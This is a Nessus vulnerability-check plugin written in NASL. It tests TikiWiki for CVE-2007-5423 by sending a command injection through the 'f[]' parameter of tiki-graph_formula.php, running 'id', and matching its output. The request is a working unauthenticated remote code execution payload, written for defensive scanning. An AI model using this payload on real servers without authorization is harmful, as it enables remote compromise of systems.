#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that allows arbitrary
command execution. 

Description :

The remote host is running TikiWiki, an open-source wiki application
written in PHP. 

The version of TikiWiki on the remote host fails to sanitize input to
the 'f[]' parameter of the 'tiki-graph_formula.php' script before
using it as a function call.  Regardless of PHP's 'register_globals'
setting, an unauthenticated attacker can leverage this issue to
execute arbitrary code on the remote host subject to the privileges of
the web server user id. 

See also :

http://www.securityfocus.com/archive/1/482006/30/0/threaded
http://info.tikiwiki.org/tiki-read_article.php?articleId=14

Solution :

Upgrade to TikiWiki version 1.9.8.1 or later.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(26968);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-5423");
  script_bugtraq_id(26006);
  script_xref(name:"OSVDB", value:"40478");

  script_name(english:"TikiWiki f Parameter Command Execution Vulnerability");
  script_summary(english:"Tries to run a command via TikiWiki's tiki-graph_formula.php");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/tiki", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to run a command.
  cmd = "id";

  if (thorough_tests) ts = make_list("pdf", "png");
  else ts = make_list("pdf");

  foreach t (ts)
  {
    req = http_get(
      item:string(
        dir, "/tiki-graph_formula.php?",
        "w=1&",
        "h=1&",
        "s=1&",
        "min=1&",
        "max=2&",
        "f[]=x.tan.system(", cmd, ")&",
        "t=", t, "&",
        "title="
      ), 
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
    if (line)
    {
      report = string(
        desc,
        "\n\n",
        "Plugin output :\n",
        "\n",
        "It was possible to execute the command '", cmd, "' on the remote host,\n",
        "which produces the following output :\n",
        "\n",
        "  ", line
      );
      security_hole(port:port, data:report);
      exit(0);
    }
  }
}
